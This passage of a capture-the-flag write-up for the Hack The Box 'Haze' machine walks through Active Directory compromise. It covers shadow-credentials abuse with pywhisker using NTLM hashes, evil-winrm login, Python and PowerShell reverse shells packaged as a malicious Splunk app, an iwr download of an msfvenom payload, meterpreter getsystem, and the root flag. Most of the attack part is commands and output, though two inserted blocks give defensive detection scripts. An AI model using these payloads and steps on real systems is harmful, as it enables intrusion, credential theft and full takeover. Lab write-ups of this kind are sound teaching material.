'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'

'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250329-180435.bak


[*] DACL modified successfully!

We use pywhisker.py

https://github.com/ShutdownRepo/pywhisker

┌──(venv)─(kali ㉿kali)-[~/…/HTB/Haze/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential

[*] KeyCredential generated with DeviceID: 4723e9b1-4a37-1172-fb9d-d1eb66df2975
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: RiINBkUx.pfx
[+] PFX exportiert nach: RiINBkUx.pfx
[i] Passwort für PFX: SShOyHNfLs34SAgndFjj
[+] Saved PFX (#PKCS12) certificate & key at path: RiINBkUx.pfx
[*] Must be used with password: SShOyHNfLs34SAgndFjj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

┌──(venv)─(kali ㉿kali)-[~/…/HTB/Haze/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "info" --device-id 4723e9b1-4a37-1172-fb9d-d1eb66df2975
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[+] Found device Id
<KeyCredential structure at 0x7faa2d64e0f0>
| Owner: CN=Edward Martin,CN=Users,DC=haze,DC=htb
| Version: 0x200
| KeyID: IviFPb/wwdUh53UH+fGdwoGInRQ48tTRprA4O/gv2nA=
| KeyHash: 6a97ce5142c80bb23afc87e9af501a486cca84ca457977d2bbed64849e1bb8b5
| RawKeyMaterial: <dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7faa2d64db50>
| | Exponent (E): 65537
| | Modulus (N): 0xea83eecdb7e534d288ec9ac838b098da752a3ca49fb57df7e16973925250fe6dedee041e457d2
4ab776733dc4af0bf8d3e26a76e8a7f50427ac7cec99eeb685ecff8ccc97d3ce8d42db1ec1d13515e9427773e9495a6
2ffc5570d35c5d7e0ccc2019b8dfbb64c3955467a515eb2386bf5db3a0605113f9510d39308f648b64a5505baa933d
df929359b21bc708a24b2c01dc26e7543f3dd2c2f56fdc3e78325e9106a1fb2888268d0edd86eb7e7204ecbeea4c41
56963bed45ca348a87412999ff2beb4c8824daec22d89051b4591981fdf144b59ef6162d4499ca774ea3c818b698cf5
aa1c20b141fbc61ecbf014f5c294268e04c422b54d2cac42ebe022565
| | Prime1 (P): 0x0
| | Prime2 (Q): 0x0
| Usage: KeyUsage.NGC
| LegacyUsage: None
| Source: KeySource.AD
| DeviceId: 4723e9b1-4a37-1172-fb9d-d1eb66df2975
| CustomKeyInfo: <CustomKeyInformation at 0x7faa2d65d590>
| | Version: 1
| | Flags: KeyFlags.NONE
| | VolumeType: None
| | SupportsNotification: None
| | FekKeyVersion: None
| | Strength: None
| | Reserved: None
| | EncodedExtendedCKI: None
| LastLogonTime (UTC): 2025-03-29 22:34:05.059959
| CreationTime (UTC): 2025-03-29 22:34:05.059959

1. Creating the certificate (add action)

python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "add"

What does it do?
-d haze.htb: we specified the domain (haze.htb).

-u "Haze-IT-Backup$": we used a service account or computer account from Windows Active Directory (here Haze-IT-Backup$).

-H "0926...:735c...": we specified the NTLM hashes.

--target "edward.martin": we are attacking the target user account (edward.martin).

--action "add": this action adds a new KeyCredential (key) to the edward.martin account.

Result:
A new KeyCredential was added to the Edward Martin user.

A certificate named RiINBkUx.pfx was created, with the password SShOyHNfLs34SAgndFjj.

With this certificate a Kerberos TGT can be obtained using PKINITtools.

2. Viewing the information (info action)

python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "info" --device-id 4723e9b1-4a37-1172-fb9d-d1eb66df2975

What does it do?
--action "info": displays the target user's KeyCredential information.

--device-id ...: the Device ID of the KeyCredential to look up.

Result:
Detailed information about the KeyCredential is shown, including:

Owner: Edward Martin (the KeyCredential belongs to him).

KeyID: the key's unique identifier.

KeyHash: the hash of the key.

RawKeyMaterial: the raw key material (the RSA key).

DeviceId: the Device ID you specified.

LastLogonTime: the last logon time.

CreationTime: when the KeyCredential was created.
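Both pywhisker steps above leave the same trace on the domain controller: a write to msDS-KeyCredentialLink on Edward Martin's object by a different principal (here the Haze-IT-Backup$ account). The following is an added defensive example, not part of the original writeup: it triages Directory Service Changes audit records (Event ID 5136) for that pattern. The event records and the DN-to-account map are constructed sample data.

```python
"""Triage Windows Security Event 5136 records for Shadow Credentials activity:
a KeyCredential added to a user's msDS-KeyCredentialLink by someone other
than that user. Added example; the data below is constructed, not real logs."""

ATTR = "msDS-KeyCredentialLink"
VALUE_ADDED = "%%14674"  # Event 5136 OperationType code for "Value Added"

# Constructed sample events in the field layout of Event ID 5136.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "edward.martin",
     "ObjectDN": "CN=Edward Martin,CN=Users,DC=haze,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "Haze-IT-Backup$",
     "ObjectDN": "CN=Edward Martin,CN=Users,DC=haze,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "alexander.green",
     "ObjectDN": "CN=Edward Martin,CN=Users,DC=haze,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]

# Constructed directory lookup: object DN -> sAMAccountName of that object.
ACCOUNT_OF_DN = {"CN=Edward Martin,CN=Users,DC=haze,DC=htb": "edward.martin"}


def triage_keycredential_writes(events, account_of_dn):
    """Return (severity, subject, target, reason) for each KeyCredential write."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != ATTR:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue  # deletions are worth logging too, but are not key injection
        subject = ev["SubjectUserName"]
        target = account_of_dn.get(ev["ObjectDN"], ev["ObjectDN"])
        if subject.lower() == target.lower():
            # Self-enrolment (e.g. Windows Hello for Business) looks like this.
            findings.append(("info", subject, target, "self-write"))
        elif subject.endswith("$") and ev.get("ObjectClass") == "user":
            # A computer/service account adding a key to a user object: the
            # shape of the pywhisker "add" action above.
            findings.append(("high", subject, target, "machine account wrote user key"))
        else:
            findings.append(("medium", subject, target, "third-party write"))
    return findings
```

The same heuristic applies to any principal with write access to the attribute; only the severity label differs.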

evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'

Privilege Escalation

https://github.com/0xjpuff/reverse_shell_splunk

We download it, and:


┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk/reverse_shell_splunk/bin]
└─$ cat rev.py
import sys,socket,os,pty

ip="10.10.14.x"
port=4444
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk/reverse_shell_splunk/bin]
└─$ cat run.ps1
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
#$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.x',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
reverse_shell_splunk/
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/run.bat
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$
total 20
-rw-rw-r-- 1 kali kali 1810 Mar 29 23:48 README.md
drwxrwxr-x 4 kali kali 4096 Mar 29 23:48 reverse_shell_splunk
-rw-rw-r-- 1 kali kali 1034 Mar 30 00:40 reverse_shell_splunk.spl

user: admin
password: Sp1unkadmin@2k24

After logging in, go to app > manage > install app from file, then upload reverse_shell_splunk.spl.
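Installing an app this way works because Splunk runs whatever the package's scripted inputs point at. As an added defensive example (not code from the writeup or the linked repository), the following script inspects an .spl archive before installation and flags script:// stanzas in inputs.conf together with executable files in bin/; the archive it builds is a constructed sample, not reverse_shell_splunk.spl.

```python
"""Static pre-install check of a Splunk app package (.spl is a gzipped tar).
Added example; the sample archive built here is constructed, not the one
from the writeup."""
import configparser
import io
import os
import tarfile

SCRIPT_EXTS = {".ps1", ".bat", ".cmd", ".exe", ".py", ".sh"}


def build_sample_spl():
    """Constructed app archive with one scripted input pointing into bin/."""
    files = {
        "sample_app/default/inputs.conf":
            "[script://./bin/run.ps1]\ndisabled = 0\ninterval = 10\n",
        "sample_app/bin/run.ps1": "# placeholder\n",
        "sample_app/bin/rev.py": "# placeholder\n",
        "sample_app/README.md": "benign text\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def inspect_spl(blob):
    """Return scripted inputs (path, stanza, disabled) and executable bin/ files."""
    scripted, executables = [], []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for m in tar.getmembers():
            parts = m.name.split("/")          # <app>/<dir>/<file>
            if not m.isfile() or len(parts) < 3:
                continue
            if parts[1] in ("default", "local") and parts[2] == "inputs.conf":
                cp = configparser.ConfigParser(strict=False, interpolation=None,
                                               allow_no_value=True)
                cp.read_string(tar.extractfile(m).read().decode("utf-8", "replace"))
                for stanza in cp.sections():
                    if stanza.startswith("script://"):
                        scripted.append((m.name, stanza, cp[stanza].get("disabled", "0")))
            elif parts[1] == "bin" and os.path.splitext(parts[-1])[1].lower() in SCRIPT_EXTS:
                executables.append(m.name)
    return {"scripted_inputs": scripted, "executables": executables}
```

A package with any scripted input that is not disabled should be reviewed by hand before it is uploaded through "install app from file".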

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.198] from (UNKNOWN) [10.10.11.61] 51701

PS C:\Windows\system32> whoami
haze\alexander.green
PS C:\Windows\system32> iwr http://10.10.14.x:8000/shell.exe -OutFile C:\users\public\shell.exe

=======================================================================

┌──(kali ㉿kali)-[~/Desktop/reverse_shell_splunk]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.x LPORT=5555 -f exe -o shell.exe

PS C:\users\public> ./shell.exe
==================================================================================
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.x
LHOST => 10.10.14.x
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.x:5555
[*] Sending stage (203846 bytes) to 10.10.11.61
[*] Meterpreter session 1 opened (10.10.14.x:5555 -> 10.10.11.61:51754) at 2025-03-30 00:49:33 -0400

meterpreter >
meterpreter > getsystem

...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).


meterpreter >
meterpreter > shell
Process 4144 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.3328]
(c) Microsoft Corporation. All rights reserved.

C:\users\public>whoami
whoami
nt authority\system

C:\users\public>cd ../administrator/desktop
cd ../administrator/desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
900dc84bcaed8c08c3aac7ad55e86ed9

C:\Users\Administrator\Desktop>
